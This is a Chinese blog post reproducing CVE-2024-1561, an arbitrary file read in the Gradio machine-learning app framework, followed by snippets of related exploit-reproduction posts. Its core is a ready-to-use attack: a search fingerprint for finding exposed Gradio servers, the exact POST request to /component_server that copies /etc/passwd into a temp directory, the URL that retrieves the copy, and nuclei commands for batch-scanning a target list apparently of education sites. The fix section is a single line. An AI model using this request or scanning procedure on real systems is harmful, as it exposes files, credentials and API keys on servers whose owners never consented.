【Gradio任意文件读取(CVE-2024-1561)漏洞复现】

已于 2024-05-17 15:45:27 修改
阅读量1.6k 收藏 10
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 web安全 漏洞复现 CVE 网络安全
于 2024-05-17 15:41:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/139005571

一、漏洞名称

Gradio任意文件读取(CVE-2024-1561)漏洞

二、漏洞描述

gradio是一个开源的用于构建和共享机器学习应用的项目,gradio的`/component_server`端点不正确地允许使用攻击者控制的参数调用`Component`类的任何方法。具体来说,通过利用`Block`类的`move_resource_to_block_cache()`方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。

该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过`launch(share=True)`暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。此外,托管在`huggingface.co`上的gradio应用也受到影响,可能导致敏感信息,如存储在环境变量中的API密钥和凭据的泄露。

三、测绘语句

body="__gradio_mode__"

四、漏洞复现

1、请求/config文件获取componets的id

http://x.x.x.x/config

2、将/etc/passwd的内容写入到一个临时文件

会返回临时文件路径

POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) 
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "5","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

3、访问文件

http://x.x.x.x/file=/tmp/gradio/422ecef943a375e/passwd

复现完成

五、批量检测

nuclei -target http://x.x.x.x/ -t CVE-2024-1561.yaml
nuclei -t CVE-2024-1561.yaml -l url-edu.txt

本文参考:CVE-2024-1561漏洞复现

六、漏洞修复

更新当前系统或软件至最新版,完成漏洞的修复。

Gradio component_server 任意文件读取漏洞复现(CVE-2024-1561)
0xSec
05-17 776
Gradio的/component_server接口不正确地允许使用攻击者控制的参数调用`Component`类的任何方法。具体来说,通过利用`Block`类的`move_resource_to_block_cache()`方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。
SolarWinds Serv-U 目录遍历漏洞复现(CVE-2024-28995)
0xSec
06-14 1980
SolarWinds Serv-U 存在目录遍历漏洞(CVE-2024-28995),SolarWinds Serv-U 容易受到目录横向漏洞的影响,未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。目前该漏洞技术细节与EXP已在互联网上公开,鉴于该漏洞影响范围较大,建议企业尽快做好自查及防护。
CVE-2024-1561 Gradio component_server存在任意文件读取漏洞
wan___she__pi的博客
05-24 565
Gradio是一个用于构建快速原型和部署机器学习模型的Python库,可以将模型转化为交互式应用程序,并支持各种类型的输入和输出界面,自定义样式和布局,以及异常情况处理。该漏洞Gradio应用程序中的/component_server端点中缺乏授权检查,攻击者可以使用任意参数调用Component类上的任何方法,通过将目标指向基础Block类的move_resource_to_block_cache方法来利用此漏洞
CVE-2024-1561通过 gradio-app/gradio 中的组件方法调用读取任意本地文件
一个努力学习网安的小牛马
05-17 614
Gradio 是一个开源 Python 包,允许您为机器学习模型、API 或任何任意 Python 函数快速构建演示或 Web 应用程序。然后,您可以使用 Gradio 的内置共享功能在几秒钟内共享指向演示或 Web 应用程序的链接。方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。该漏洞允许未经授权的本地文件读取访问,尤其是当应用程序通过。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。暴露到互联网时,从而允许远程攻击者读取主机机器上的文件。
CVE-2024-1561
最新发布
ubaichu的博客
05-21 615
漏洞源于 component_server 端点未对 Component 类的方法调用进行权限校验,允许攻击者通过参数注入调用敏感方法。Gradio是一个Python库,允许用户无需编写前端代码即可为机器学习模型快速构建Web界面。方法,将服务器上的任意文件复制到临时目录,并进一步读取其内容,从而实现任意文件读取Gradio任意文件读取CVE-2024-1561漏洞。构造请求,将/etc/passwd复制到临时目录。当引用相关版本的Gradio库时,会产生漏洞。使用vulhub靶场。
CVE-2024-0603 漏洞复现
Jay17的博客
07-02 1126
CVE-2024-0603 漏洞复现
CVE-2024-34351 漏洞复现
Jay17的博客
07-10 2780
CVE-2024-34351 漏洞复现
[漏洞复现] SpiderFlow (CVE-2024-0195)
k5664524的博客
01-11 1440
SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器
CVE-2024-6441 oripa1.72 反序列化漏洞复现
qq_50963067的博客
07-24 385
漏洞的成因与WebLogic漏洞类似,即不建议直接使用jdk原生的XMLDecoder来处理XML文档,应当加上对XML文件内容的验证,修复建议可以参考WebLogic。传入XML的效果其实等价于。
2024年前端最全复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞)2024年最新一次违反常规的前端大厂面试经历
2401_84616533的博客
05-13 1136
前端CSS面试题文档,JavaScript面试题文档,Vue面试题文档,大厂面试题文档开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】2. 抓包,payload后面加入poc,然后再在请求包头部里面加入cmd:id(命令),如下图所示:poc如下:复现成功!复现方式二——反弹shell值。
CVE-2024-26229 漏洞复现分析
Misaka10046的博客
08-30 1117
该本地提权漏洞是Csc.sys驱动中CscDevFcbXXXControlFile函数存在越界读写导致的。
CVE-2024-38077漏洞复现及修复(无坑版教程)
热门推荐
weixin_61782918的博客
08-13 1万+
微软超高危“狂躁许可”漏洞CVE-2024-38077的检测及修复过程
CVE-2024-3094】——漏洞复现、原理分析以及漏洞修复
IronmanJay
05-17 1万+
XZ-Utils是Linux、Unix等POSIX兼容系统中广泛用于处理.xz文件的套件,包含liblzma、xz等组件,已集成在debian、ubuntu、centos等发行版仓库中。2024年3月29日,安全社区披露其存在CVE-2024-3094 XZ-Utils 5.6.0-5.6.1版本后门风险。该后门存在于XZ Utils的5.6.0和5.6.1版本中,由于SSH底层依赖了liblzma等,攻击者可能利用这一漏洞在受影响的系统上绕过SSH的认证获得未授权访问权限,执行任意代码。
漏洞复现Gradio file SSRF漏洞(CVE-2024-1183)
qq_67810151的博客
04-28 782
Gradio存在SSRF漏洞,未授权的攻击者可以通过该漏洞扫描和识别内部网络中的开放端口,通过操纵GET请求中的"file"参数,攻击者可以根据响应中是否存在"Location"标头或"File not allowed"错误来辨别内部端口的状态。
复现】D-Tale SSRF漏洞(CVE-2024-21642)_26
fushuang333的博客
01-22 969
复现】D-Tale SSRF漏洞(CVE-2024-21642),可能会进行端口扫描,内网Web应用指纹识别,攻击内网Web应用
漏洞学习篇:CVE漏洞复现
dzqxwzoe的博客
02-04 1716
1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的服务器上执行任意命令。可以看见,apache是49版本的。这里用vulhub环境。
Linux 内核CVE-2024-1086漏洞修复方法
20000_ZuuuuYao的博客
06-06 8438
漏洞详情Linux kernel权限提升漏洞CVE-2024-1086)基本情况:攻击者利用该漏洞可在本地进行提权操作,最高可获取目标服务器的root管理权限。影响范围修复建议。
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
网络空间安全学习
09-19 1万+
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值